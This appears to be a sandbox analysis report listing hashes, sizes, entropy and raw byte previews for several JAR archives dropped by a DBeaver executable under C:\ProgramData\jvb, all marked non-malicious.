      SHA-256:4056E2E03734CED34BF5664B731C6AA4B25F223EACBD604400DBAEAB4082F553
      SHA-512:DA5150E12F1BB4CDEA48519A71A9B06907DE1F3530F1AE06745A1A148780D12A79A9C361D04217CE1D6E65539FD76ED3508AF8FF7CF1FE44B61C6467F282AD3B
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.U[..H.~...`........Lj.V..(.."..Zh....4..>.N.$3Nv........F.!..$-/a. .>..L.X....xe-.6-...t....W..Z.Vm....?..5.......n.A..Wu......3.....3.(\.)Mm...`....-...G.......P.0..1e......]....)...A.t..-.gO..9.!H`Y.Vn........a..vU.m.E.dl.C&&aJ....l.[.X(...!..}S.S...*U.i.>8./\.......qt{..A.. .>..b.CR.P$.L.$.....X....iY...\.m.q1..2n..b.w...=.7...I.?f.&...|.~.B.D`.|..tp."......0~|.....'.d@.}..]G.Tm}...X(..ID>qQ....g.S....\...%03..+.o...jn.k,c.%l...bu+....U8.|..H...'...:a.N........8W.3ul.G.Z.i.A....R.A.v..,."r.O......s...........-.t..t8=g.f[...q=..(..Q.z._S.hTMS...$...w.6.,>..."O..^.]........R.L.......X.e.z]$..B..q.<..9?|Y#..B.5.o,......)..I....ZG....2.....j6.Z.{.o.......[.k.CU[....]UQI\........IZ.=........V..J......GQ..OBK.5......K..6......J./w...1Q.#....1....>.5a..-s..V..7.`*..R.VM.C...Z.Ws...\.T.e.8.Y.Yq.....[.zd.X.].a{Y.?....{K...z..m...9....(..1<(...W..e#...z...T...f..IlC5..r._...H..].q.B..,.QW...B...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):172746
      Entropy (8bit):7.907906965149932
      Encrypted:false
      SSDEEP:
      MD5:54E295219B1D7B58E4BC1F48BB8CEE8D
      SHA1:40A6FF29499696427D8642E8016601FCF9DD99B1
      SHA-256:D38BFB04C59A78B0DED18B8B88EB5B9F388737850DCBE532BB3A3F602B534675
      SHA-512:889002BBE6D9309A6E2EA01A145A5D1073BD63C2A22D26E8A795AB33FA0EFD9644E8AD5CAB703760E9E2B8D394516709E34139698C1609C2C8D5BE35C4972DA5
      Malicious:false
      Reputation:unknown
      Preview:PK........J.cX................META-INF/MANIFEST.MF.ZY..H.~/..CiT......m.{..f1....xi..0.f._.qn]Y.d.sZ.b....".9.Y"8+.O^U.;xe.f.._....Oh...7..)....O..0......|1_...........=..wa...VzV.?=G...o..g...+.....o........~~....0.+..s.V..........?U...W."....{.........E....*..>..y....[../V.......+S+.{X.F.......?.^....a..<'........u..+...u...qw..C..^<?.,....]="..u.a..3ee.......6J.3'.~..fed{.....g..p\....V.;Yr.u..w.s.....i....,.~<....$s...t..U]...GC.r.._Y...........1...;{4...x.1.o.0..~....Z...d.....g...UW..e...j\.h..F..L....G.....^9.{l..w~..W.x.g,+..XlU.h..._FIt....M....G....>.".....)....H.^.....'.}.7.45.r....M.%..8..m....A...f...a=nlV.#..?..p..?.......?..b).o..<...........O..{y..<`..<......,...~\...Y>...w.A).p.RU...+E.?..s.*..I.............CC...Jtpn...e53...H./.2\6....P....(...x`P..q......2...aG...ile....JL...|.?c3x..,...f...d..Iw.w......K.g\....=.XMZk......"k.r......A...Gc{\.......Wh\.U'..P..V.'.f.e0ZV.._2C..]i).>...i..9.7.yp.g8E32..`%My
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):687139
      Entropy (8bit):7.945144334065076
      Encrypted:false
      SSDEEP:
      MD5:CE053C0C3DA664E02A06D42B9112A2EB
      SHA1:3BC7A182F59AAE474C580A220CFB1A23AB9CADC6
      SHA-256:120CA8256F02C1D91720B20BAE76F5120844EB0D271B763788FEEF97FA986B4A
      SHA-512:1D564F57D0175AB44669FECD513BB4BFE394FE34DB47BF66FF98BD109F29F4B953B3BFCBE3F0F5358F505817E610D86C67499A1CDA8D7F71EA4CE7D0005B35B3
      Malicious:false
      Reputation:unknown
      Preview:PK........*.cX................META-INF/MANIFEST.MF.W.........6....P/..(....s.....s.s..?RU....*...>.*Q..s...H.-.(..?..........?...i.....?.:..............0..7..~...........K.~M....oC........ ....V.....[.{[..^>./.u.<..P.a...u..*O..K.6......m.p.V/....-.<.K.w........W.......M.\..y.v....^..7..m....W.c"..e.....}......?....6...._.&....~._....~U|..>...Y...va.....[..k.U.........g...U....i.zi......}S8.U...k.x..?..O\....D.....JX..?y.w.s..t.{u.........?d.?.....E.......ztQ.5....+..7.n...^......u.o.~i...-.r]^.._w..._Z.....o.uaw...K..........:.Z...^u...].r....+..M.J%w...4..M..i..j..o..u..'.......-..0.E.U~...t....U.......!.[.oL.....a._.U?.............9.........oh...........b..b..b.u1.u1.e..WU"yY...\._....F....A.Xow..i|....K...B.B...0...3..$..+%..#zP..%...?A..zy.]...4.J..n.-......7Ew..(.i...yo."...i....!.Ed`3.(.#....V.C.._."..7..V...F^[7.\6dh.eH..C.A..,1..l.....y....U.{...+.e/y..v..n.....4C..........VI=ew:7..e.*h=.....Ix..Vn..u.{d.-....|..n.Y.A..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):17422
      Entropy (8bit):7.831061407519081
      Encrypted:false
      SSDEEP:
      MD5:5615CD92CE7C84C38A2885F1D9F67285
      SHA1:29A770B5725A9C74963F113F190051BC03B64E7A
      SHA-256:800E8A20EB194E5C7DB11282B23FA8EC2B44F80376D9F1D84F5151C133E5E9A0
      SHA-512:14832998B4F57468964DCAFA5D3C09089A0360615942CA4DB585B8DF4CAF53A5E8D34A83BBCC51D52C4A03A037163861192B1E6372131B1CC22249B699EFFA9F
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..Ys.@....?Py.J*...AP.kTp}k.%--..!.v.IM..L....}.s...xh.C..!....9Y..95B..{.....X..V3....T(IE.(WJ.n.i..7......4.......y6........8j....7~....N..rC.8.4.....:O...v..C.M.&T....!...).jP..........;uM!.L.o1O..R>7./.".?.}.?......$..T..E1..g|.....~@.l..G..$..5..p..s...fD.=...YbQ...#zw...l.F..........!.7nn..^j.........6....M>..ej.IM...LM....`....!.......|..|A).-.-.s;4.(..{Q.|.y...Z.fO.J_.a...*.i..:...........PM......p.....:U:.~...}.+r.2T.;......G..d.?.X..{.4........Zn..+5....j...N..&.m.bgF...9q.+w.........VA.-.Ca4.c.z_.K.t.\..1L.P..0.8.:8n'..?Fv>......Z:............T...L.u..~.$.......@5...G2..pW..xS..P.Z.f.n...(.:..l[Y$..).W.......{;..&..#b.k....6.5..Q..L...........l...}....+..~.PK.....\........PK..........cX................META-INF/DBEAVER.SF....@.....r&FA..0......"*.Z..V..4.y.an..LLf...E.J.8H.-.....q....vd..E.?...t..D.Ip..................$...3.cy...j..Dq.{.^N..\.'......L.......c..'}.R./.E..i.'...7.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):315587
      Entropy (8bit):7.901726329867534
      Encrypted:false
      SSDEEP:
      MD5:617AED0F3B8DE932DA9BEAF91699175A
      SHA1:171558C3F3C48E56EDFA83A09C8193FEEB559642
      SHA-256:E73F6EE607FE45F9163F29BA26169F6204A11717A03F21D4A64F3FDE10AE5064
      SHA-512:A9BE4866A319D2B7F971A3D16D08FE8028171A00E9ACECE295CAF5578A77084B3E51846F84B243A6B1CD28E3BDF6DFFC1DD8B1BC7E7D29AB5DA228AE4CFE4211
      Malicious:false
      Reputation:unknown
      Preview:PK........H.cX................META-INF/MANIFEST.MF.|W..H...D....x...N.$.l..x. .@7.8....?.6G.V...;.J.de=...R.29.]....]R...........<.s.d..u._/b...I......k....[....I....x.;....7...>...N.e...*......[;....z...j..Q.....A.4..........Y.u.>.)..w.._vM.nH..K.(.....C..I...;...}.q/..0......~.._....6C.....^......U]....vL.......w~......?^..We.../..r....:._.....'}v..../...]?......|}.............._.A.W..c._.O..N.....9+. ._..Q.........+?....2l....'};..._y..c...Wn_......*...I.xI..._.n.p.....'..e...1...'}6........../..z.yW..r..I_...S......?..-...}..^W......U.k....../ny/K.E..'...O...~...>U.....rw.?[.eP..C.]....t.v...._.......}.k>..A.....c_..Su..~.....U.?>..{.>.s..s.}=...WG.Z...\.|7O..e......?.....X..g.........O...O........[.........9_.J.............{.......a...._.......o........N..N..w.C.|.D.g...&5.r._W..9....V.;.f...f......I......O...s.....-....P..N#.[...#9.......-]..QR.....'...F}j-*..M.eHC....).(....:8.|......*.sp....s._,.x..6PoH..bY......^..VTs2.%^c..t.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1197124
      Entropy (8bit):7.962904690314108
      Encrypted:false
      SSDEEP:
      MD5:D6B328AFEBCE96CDAC84BDA7A681ACEE
      SHA1:F4986164255C5FB0F1D0DF87C372D6004A0F3C49
      SHA-256:2217BB5C0D9985789A9182137061D9C71DF9424E61E06F5A358F37B1F6F71769
      SHA-512:278BB129BB5D2480D9EA4AFF98C8F81C8CA6179EDE5E73BA525BF584543672EE3E5A4695B078B5C4BBE969C9BDE660978F4C6D03338C27F63F57780B8D8C9C1B
      Malicious:false
      Reputation:unknown
      Preview:PK........*.cX................META-INF/MANIFEST.MF.Y..Z./.^R}.R+.Wt..c.u......c0.x)1.f..|..#r.<.v.t.._2....{.y...[.Q...6.K..?.......jH...bp..^......i..._.....Z.........?...........?.6t.0x.=5.A..[.....F..Jqo.`.....Zu}..a./.....e.\xU....Wm.GvN..o.........&.?]Z.y._..?};..o.?.?`..../.r.....f........C..!m...^......3.].y.....6...j.........^.G.x....._\...w.;._.8,.6.?.....?...a.;..<....\.!emx..o..>.m.v.....1...~U..WU|{jW..{\.t...o.._oy.mU.7..2`..../....at....I.n.n..._....o...n....|..J..k........N......>..e#..]............owzs..w.*%y..\{.......m...-.*!]......_....xa.....|7O..~...:'.[PX0...|.........^......:.3.~.....q.8.#..OtU.a...........~.?.;.......U...........?......_..~} x} ....b..t...........C...#k..L._.......eW...n*'Kv...../n.3..8\2.q...g...AA.We..........^....../2.Q...'......4W.\....1....]... .Ju...}...!]...^U.wF2..Q6.ig...<.>.s..#.S.(.B.y...N...m.tI.......V...z.t.!...O.%.....W...KC5.....st......M./.#...e..xWKq~...c.2T.)........W.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):437362
      Entropy (8bit):7.98788903383392
      Encrypted:false
      SSDEEP:
      MD5:DD41162CBB711E32E698BEEB51A0C8A6
      SHA1:31EA5F8A3C7B9E6289B1128006C2EEAD40894913
      SHA-256:815D6D007BBBDD1FB00E748EFB02E637AB8CA47495C5DD0723342193E049F48A
      SHA-512:30B80DC3721CB357BC41F6424FEA256ADD4DBCE6B8A32A31C632367963D2618A29363B12FB655DF57E9AF5986E78F35DE534F0D18D48EC17BED8EF1639F0AB92
      Malicious:false
      Reputation:unknown
      Preview:PK........E.cX................META-INF/MANIFEST.MF.U]..J.}......[I..E...>.......`..d....}P..f.kne.....>..G... I..0!.Gw7..S.t3........:.!.t6C[xw.2,.4..-.=F..nqw....aB!\....R.9.f........>....C.snL..Cx#.....(...8D.%.'>...!...<..9.R.c..."?.i.w.&..M.R...m.A...9j.CX...l^d.).e(..K..tB..He...O.'.J.(-...+.Sr..M.$8K.H.$%.?..4)^.*+.G.]..n.'E{....'.K.Bp,^...8y...Z..1N.......y."d).XN].n....f?)..1.Q.D....Q...........|}<...=0.o_..?.o.o.T+....T..Q.qP.W+.,..f.."....u{^;.|..."..0.cO.k.DD.H.....7.....q..(....mEV'..4...\(...\;ZcHd...X..0o..<..UE..(uE...-.....]H...a."H.".....[Z:D.c.i..,-...I.>.F*...U..]2..J#.....ti.}1.~2.^.$.a..........7A9k..+J9! ..w.C7..~cC.7....C..w......h8i...tM.$.P.)..p.QG=/.......p..cc........H.$.....J..JoK.yg.i.y......v.c..M....aw#2:.k.9...^V.|..~....o......m..M....[bn.n0Py'7......u..i...k.,>..H..B..+AhY.^..:6...v.....0..?.U.\c..I.-.iU..ZC.$..f......:./.Z&.Srm.N`. ..c.aZ..&-.}......X.Bf..X..{"m.'.g...S.....R...+El@.].6....vX.(...i-..j....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):66399
      Entropy (8bit):7.947586618304477
      Encrypted:false
      SSDEEP:
      MD5:9F9490C6BFE83F056E57258D8ECC3818
      SHA1:E3623743965C1B7924D6837FB1076AE5F9A5B839
      SHA-256:F0B913A606E40C94F43F75B3DB6DAA3C77C36A5AE859F9E97BBF5366D9DD4D32
      SHA-512:1511FE5F756BA16A4A30AF6ED9AADC7EDAA17F5AC52BEE77CF099E461A0CEDC90C1D973423638F5EB5EAF1C47B565AB7CBB05394B9E07166263DB8F5BE170440
      Malicious:false
      Reputation:unknown
      Preview:PK........#.cX................META-INF/MANIFEST.MF.V.r.J.}.....p+).Ihaq.UW.H..byI.F.4h......6vb.....t.9}z.F..[...H....Ta.b..`.,..S^.........../.b.&=[.r3.+...)",....A."..y3.M..G...`.r5.'.v..SZ..~....F....".....: ..sp../X.@.....A.b.[..9.=%I.PB.ho.g+R..9........3.. ....y...Hx.T .).9..D;W.......G.`."....Hsr..9...s.%...S...<6N|v.o.....6 ......o)...]L..{..!...e..{.!.t=)...`x.X.?.S..`}\.+...O.....4....../......x..]i....q.s+...g.bAIh......jr.._....@...(...Y..m..C......>?.. .....S..Wj_.|*....(w..A.....r...K.-f.6........ba.W.\-.....]..ey.o.......$..f..4.Vk.w-,7.+...#......>{....ye.......h.J[I.1Q...Y...Zcl..lRw..=.KJ...E....$H...~+57.M...y*.b.8Z}..EC./.~.9.N..`.o.`...+..........{.....c6...JG.I....U.<...Z..Z.Bm..>..n`.:...:...-..V7.vv5j.....}.F.>i..l.......P.......q L..W...l(H.T..f.#u.6.%uk>#R.....m.JdJ....C..||.|..].qLv..z.............DP....&...`...~......B.b1^.b_w.J......t.514..m+...u.9DM_.s.....iG...5.Ok.*.+....t..d..<W.gb8..a....!..<E...7;.M*`
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):40740
      Entropy (8bit):7.897907385487788
      Encrypted:false
      SSDEEP:
      MD5:8480F75EF483DFD083E7FF3CFED39E74
      SHA1:65385A5127FFE12937B993D63B5F50E2067E554C
      SHA-256:509FC4EED0B8756AD9648FDE86A84C526C87CD7E6F11767CCB1BF3740C8E46E3
      SHA-512:62CFFB8518EDC4530362497216BCABAEB42F23F042BA8F9BA755414D4831EADECB9296327C64E35CCA1D39F4D04313AE05C0D64D797829DFB90D01D53A80CEC8
      Malicious:false
      Reputation:unknown
      Preview:PK........H.cX................META-INF/MANIFEST.MF.U]s.J.}...`m..[...A.<(... ..........._.A..&n.[.G......n..G.$qy.#....T..b.. l...W.CheA.96E.x_.X..V.j..=.....}.6!...FA. D...~.o'..ay.T.R...F ..i..).~.w0.`./O....0..O....".~...1M.?....A..a..z...^..u.Z.~-..j.1...;.....%.b..q......1.|..2.X(...ba....`......F!..._.....Q../?%...2XH....?#.;...up.D..}ku#.!.s'8h.....Zs67.y.\...Yt..$.6.@....g.Az.....?...D.%....(=}}_..].,.$.WX.1OO.....Q\V.......6.L..N[.. .Xh%q..(X.a`'......(. .&.(....E4..9..........>...`.t....y..*..o_..b.\2..|.....k..z..An...%F.U.V'i...7...;..)y.#.N{..f...7...b&.9.`.D0...".I.s.s!.}h.....w................\...P.*K...:Y......ac^9hW.n..#J.0.B....4...Z(..B=.*.Y...5.BI\.....I.6.0.......L ....G......~..;5....T.....wB....,o...u.......BB2W....&m..*L.V...a..M.G`.ay.q.......0..z..1^.!....1i.z.a..@%.....ZwT.Y. ....i.5..y..\..(w.W..zw)^.5...G1.....fj..y-...(.........|M^.eWeu.Z..<.D..n....%...).{[q.P.!..........G......X\.CYi.B.....}.-....n.T.^.w.!S..n
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):31168
      Entropy (8bit):7.828373527375964
      Encrypted:false
      SSDEEP:
      MD5:7A261DD5F4C81A0956946151F6426F58
      SHA1:7F6235DFEA35F93AD9B9A6F762D85AF7AC966395
      SHA-256:9B82D746E8AE9A993B040C69EA1FF440BAAE563FFAE30A105B84C332D4AF0705
      SHA-512:C3B414B2515776074B1EAFC034EAED52F43A2D923E525227A0E56D492E6E1DD836FB58403172D1FCC1F2FF3BA3C93700A47CAF9D42122BDA37C4821EE89CD6E8
      Malicious:false
      Reputation:unknown
      Preview:PK......../.cX................META-INF/MANIFEST.MF.V]s.J.}...`.........<.....D./..F........I..T....G{...s.gD.1Z.,..a.!.....S.H..........$.:.f(..5.ay.c.F.?e.u.p[...v0...V....z..R.{!.k'..1{9..O.].....a.L@....z.3...C.......e...s*{)...'C1....].....Z:.......B..z.h.../.....qz....RR..p[..._.^ ...$....{D..=Dj3....@..71...5...?.. x. ...:.1y..4...+.c.I.yb2N..... D....n..z......sJ.".9.H.[.W\6.....'..8(D9i.g>q..Y.........<..`.L........._.~T+...~&.O.4!.O.t.hb....y.E..."}.$..7.e.9..lS.w.Ov..f.."4%w.....Um.%..4....]....1..l...}.....1...f. TT....9..4!w.:.......>[....q.W...q.v(.....&...QL..=.~..M.=jE.J..@..I.c=..-in...-.B...?Z.G.~.;[....p]...F..ywh'N[siq......`...+...,..<..U../.4?.eGO..\..................Qg<[2...Q>...t...z.vw....-wol&..r65...?F....3.....d.v...q.F.f..!.{.(....6...F....W2.......V..`.+u...p.........{.$..5k..;7+...qz.)..%.S....zv.,a...i'.f...A...@.^..6....Wd..8;...b.SI.G./.8..f....GV....G.9....'C[d.^..C..S.N`.V.1e.@.f+...J...9...Y..KFS)./
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):47924
      Entropy (8bit):7.929053375606171
      Encrypted:false
      SSDEEP:
      MD5:1DBC877A37BC7CBF2582834EE7B6B9B2
      SHA1:1FB3DAEE4C78F5DC3A69EB3EE5D8A5E1ECFE6A20
      SHA-256:2F9A7F2816B9CDC6D65AAEC50E992E452F5BF12384B0CD63D0D067CFFA86FD3A
      SHA-512:B6F7A2673EEDB9781900E4CF54AF4AFB341491F8A4107BB4B5064CBBFB606C3B86D56144E24AA0FFEDB8FD8CAAFBF83DEB73C901BA1C48510985A8237CB06498
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.U.r.J.}.......Le.T.1S.:x.. (.....Zh....|.t...I..#..^k....h...(F8x.5(.Z....k_.Bh....l.|.Xk2M.i1.F....z..X...2.Q.W+....Z..i`y.._:..7oWS...=...1.=X.B...S...nP....C......GqL]..<...b..B....D)..x+.j4Z...Qs.A..z.....V+sxHQ../.2.6$...+C12.....S.a..(.ib.....Y(e. .../.....n.y3A.H.2..!2....7...G.6.p.V+|.`.<2....6.O..V...u..{`...g.-..(.y...1 M.je.o.{;.-..:.....c.Q............_.&d......%"O......j...Km.P.O....z.....MR.X.4..J...t.YA....'.zr.......<...5..".@.E...4.M_D.. ...N#....E.0=...I0z..w&...$.h...k.+"~&...........2q._..~....~_]q..".w......i.q.4.z..;t...m.#.g..Z.y.W.2L.y........jK.Sxa.....bv...z..9X...G....W..(..wf*2.....M.h....$.x..C}.6.i......+.............Z.l:<.rk...|X....J.).E.6...{....XZ...0{.c._:..&.....$..oL].l..=;...6...x.L...N.p...9.,.My~..+.<.......po...!.m .c..0h!..C........Nx../..|~.O.L......f^.)J~....SL%.....f./..#........Z6.E.{.J..$.3.6...\KG..j,W~..N...S..'.-R.;vF[.<%W.Ke...&Z.0.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):13077
      Entropy (8bit):7.80265894205423
      Encrypted:false
      SSDEEP:
      MD5:0D2E5766C18BD3BC83650AA61390A746
      SHA1:8AAFCE95C7CC093CEC056C101E2BEB37318E7A5D
      SHA-256:AF99E3CCD3BE599E4F76DE53540223B88202566D1EE3B0B4174DA82E570500B6
      SHA-512:6DAA5DE56640016FE8C548C54AE9CEA686BE0AE48C1AA65514D5CFD76172EC1D49EE5AEBE0BBE0F38D429E2DAA1127DA5D7439FCDF47BB647B39AFB0B81338FC
      Malicious:false
      Reputation:unknown
      Preview:PK........=.cX................META-INF/MANIFEST.MF.RI..@.....H.&.4..v<.NF.V{\..X.).J..._?.(:j.c}o..W..%0...2B..RD.YjE...V'...X=cS.AC).Jz..R..n.....^..!D..R;.....[.o...N..q)+.q..i.g...w.A....d.-.K.....Z..c...;.X..)..WF|...(.<. .r...+...i..`.jGX.l.Y.8.1..2Pjc..Fdi.ADBP.e...\.a....s... .V>...r.zP?.......-.lJ...DH.(...p.#.0....!B.H.#.....*p.N.:..M.,..............y...7xA.,.(s.tx]...a.....;a.>...g>..go.....,.R.q#..h.4..j.\Q;......f...!.E=...o,w..O...5...)..y.Uj..F.@;:.N.4.@K.h...5......w..`.B..J....%.>..W..QK...`8......m;5..1.x...m.?..}P..!}....27m..:f..ku......Z}7v..#.c..>...PK.."...+...d...PK........@.cX................META-INF/DBEAVER.SF..K.0...&...gB....,.. .. ..].Z+X...~....d...<'y.'...S.E.....dT.Ce..-..9.e...\.(..r(H.A`..._.=.2..t&..F.......:...n'.h.6>,!?6..j.(t.:?....E7+...n T68/H$8b:h..v.%....._R~.D~^<2.......bt..^....=|"....*.3..M.N.QwL&..N.d~......Cf....s,..Br._......0....%*TTs..R.*..C..'..w+...p.S..7R.......{h.43?Up.....8S.Y..x/..6..z.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):58761
      Entropy (8bit):7.883971487621675
      Encrypted:false
      SSDEEP:
      MD5:9B4CE5C49D463B44A78E884A4D853399
      SHA1:AE0847A4DFB74624686A7AF1C26984A3388700F3
      SHA-256:C0D6FAA7F4DF2E18D80F89383E82B59411210C3F452A588E895D1396D3DBA873
      SHA-512:C1E57E53283B6CE04FAD8CD04F2A0D749D8BE8810FBE44FB2819AD7A4B9B1C7B42F49712A1D20B056ABD10718DB7E2BFDB33A5DB66BCCEAC2F29D82FFDFF1E59
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.W[s...~OU.Cj....(....~.A.DD....l`#7.(...t:....u^.^..[.o/.. ..e.y.......wl.".+....A.=....Q....x..........6.......=...Mr.J..v.V..........Z.'..}..A...J....Dob;..s1Ms...QQ.~..........%~....{.W....{.=......F.......M...B9.^...?.....|...9.......(A.G.;....~F......EE..7 )......4/.K...I..D.|........_.....e...A..a.T.O"pn..(q..g#L.<{..D.(.....z.wLU.q...mR...G..,..d.F.YK -|../..h.?~......r.].G....<^..;A.........,.*.%.:n...n.Hu9.-..`R.d'../dZnL..5*...,...i6.....&..?=...g...}...].c.....x.JZ.=.)+..s.....n...I,.`..0.%.?..pY.;.Bc........S,"......Y.7..ey...D...B.*m..(..%4..C&>..v..<..3...3..X....4.!...^..80.Q..s.n.m~X...'....[."..y_..l..X<M....D.......x..}.......~]....G.....3.~..0%.[.a x..-,....v...LhU3.n..D...3Qqn2.LK..BC..o.0I.*NZ)o.<...{R..TQ.."....t&j.I....@X..Wy....[....?k.Qa)xg.KnZ..zZ...F.`.e.x}....xt$'..pUv..b..Y......UC.B@L.vHV0....X..+.I.m..Q...ip.WR"...H.UD.......P0G.X.....J.BfS......5G..{i...-)
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):22385
      Entropy (8bit):7.8619487999786735
      Encrypted:false
      SSDEEP:
      MD5:A41C059C0FE66226F4D3CA9BA6486782
      SHA1:FBE754CE88571CA0EC99D60FFADEFB61383BFA50
      SHA-256:56A0EF54D8EF5FE48371F21EF2913C79A789126CD6EEF451E4D653D99EBBAE75
      SHA-512:9B5A9D7C3A5BC58503BA77DF27C835AC399657AB1AF36AFDDC88F83BEF3A8912BF9792A484B4259D2BA4593AFE4BD1FC14E652AD69C169B13440BF2E658C2DF6
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..K..@...V...,R3e.E....... .8nR.4..<l.|.....$.G*...}.9........, IP.6KU.R,.)..3p|.....km...,..^..*..(\.)#..%. ..EQ....(t...i.`...7a.v5.'.U>.). ....4...oM.!."....x..GI.^.......{.B.C..(I.m...lU..?.....C.@F.......nSD ......d....<.B..J.(.4...r..08.^Y....`Q"......D.t.,..B;.Q.O...Yz..1.b...#B...>.>.....A.1..F47.%.b!......f....K.5..0;.w.3.VU...R,..7..Y...r.(w.....K....}._,..6.....y..j.V]@....[9.S_>..P..T.z..Y..9s.!N........}.....%I.;O;...Vo...E.d...d...EC1..u^M...>..k..VB.:..g.1.bH(.ox.'...QY!#w._m.[l.\R_..6.C.OZ7.Viw[....."..GM\.......j...i..Iy.T...H.$x.G.......+..........0S...7W..#.7...n#8<.Q.|$N<..^.U..q&..9.,......".;..n..dY....?i..f.o...0|/)...im...S..{.x:....B../.U...!o........l5...i:jOS.....vY..<...{..s=...PE.C...U.W$-.K.a.....D.].?tM7..q.......Eg...PK...j".......PK..........cX................META-INF/DBEAVER.SF..O..H.../y..eO...(&.P.......Ia.PZ.ZU(...t'/=...[...89.W...Q2.Z#.qA..N[~.3.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19612
      Entropy (8bit):7.810797279559549
      Encrypted:false
      SSDEEP:
      MD5:1A61897337A2A910DE23D53724BC8A1D
      SHA1:4533EAB83A16814494744118BAE3B14610CA7F8B
      SHA-256:DB686487B68FC38E5FFB6E1D90B1000E5EF0B8BBAF883889569890479F0F2BEC
      SHA-512:2DF263EE8B75309AE15640C2C4FF07AE5B5C8DC00A2527FC36B676B4444A486D0265D11662B53D0428A6F309EA51EA223220C48ADC0A588E6A88E04992CC999F
      Malicious:false
      Reputation:unknown
      Preview:PK........H.cX................META-INF/MANIFEST.MF.T.r.:..S.?P.....l..s.bapx....!.)?.QlKF.m..x...I..u....V.C...d\.C.......b.....^ Mc..^.P..R.)U...S7...z.s..B..).Z...z..f...J.r.\....0..;%.......].....B}.. .....r.....d..!..i.s..m.-.s.C....fP2....ba.7..P:..'.n.b......%...`.L..s.b.DAD<.^@.:`....>."......h.....>..`...w............3.Q..C....#,..........s.......x.."@...;{=.......q..B.......(....H0..xI..oS...-;...".& ..3.+.uH..W.\.j............__.(...\M>..'5Y..{59A2...|.P..w(..]C.h...|..Ko+.P.l.KW.....^....b...c.&~..2..n..P...G.l..q.j.....o...*....U.C.....:1.'.@.3..i.'.Fm9T.,;...%..).!..~2..........x....o.F..:c.2....L.......\.`......ghl..+.FZ....N3.kM..,....x^..;.7..N.o.w.w6...e.._!.....I.2.1.X.R.Me..Zi[.L.i....ZM....mU.oF...5...`....?...u5ky..{..`...:...._..(}+.....].&t.P{.U'._e.<...=..O.Tg.dm".. ..PK..........I...PK........H.cX................META-INF/DBEAVER.SF...r.@.@.V..,g... .....1>.._.I..B..&M....Uj2Ifw.....8&.......0%c./.......g\..M....c.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):41221
      Entropy (8bit):7.893699813776655
      Encrypted:false
      SSDEEP:
      MD5:C91BDC36B0C19B71AE8C8A7A3D586968
      SHA1:FEF5E00B73676E35F9D9513D003334E24CCFBE87
      SHA-256:ED6DFBB98DC5B765FEE58D9D28B9DFE4E1A184C61C85BA3FDCC41D77802BD85B
      SHA-512:84C17CC004FE6426113531955D0F045A2B0A97F80387B758586A831448D73201F536AAD2FAA9AE519397081F25ACA49E44A82F168F1332C41B728CF917A5558B
      Malicious:false
      Reputation:unknown
      Preview:PK......../.cX................META-INF/MANIFEST.MF.U..J.}.....p..1`..L4...w{...^.......,...bf...$......S.*z.\|.a.XC.b.}.5).Z.c..i7V>4.`.GL.'.Xc..g8.kv...!f.5S. ...^..#.D....k:.1{E....9.`Hb.MM.X.y&t....{.6^.=.(..aH...iDE....E....O....[.T...N.....!lH..+c.ZY. ..6^.^..`?....H.......u.....Vj......6...rz....jx'.y^..B..E..p~.S.2.g."...".U+r.{$j(....P.;.^.../.....*.`D8.Q..r1.......o\.#?..y..............G..d4.....s.......t...B.)....1.......>... .+....eb.../_>U+........Tz*.B.m...F.\?.5J....Xh.R.rY.j.n..Aw....7M..8........4....].._6.|.."L.....$..d?..5S.^..{....,..C.`.....B....~....)..r......w...4"..~..Tx,.........L...M..q..>+.M...dO..._"..pKx.x....Y.|....yf.3....>C-b.y..r...>......gt.w..|Wb...5....-....[..>...=....BR_..^?=0.'.,[-..?.....p.......p.N....K.+/h....6{.4.K..s.....$.....`......d\Z/W.{lS>.|H"..A.h..^..`.z..ls .Z.[.U.../....6[....[..N...y...08..$U-....6..l&.l.X...@..d.G....o....gq......../(...v...hm....i{..jk.x{...Z\.......g.X.5..5E.pi..Jf.;....
      Process:C:\ProgramData\jvb\dbeaver.exe
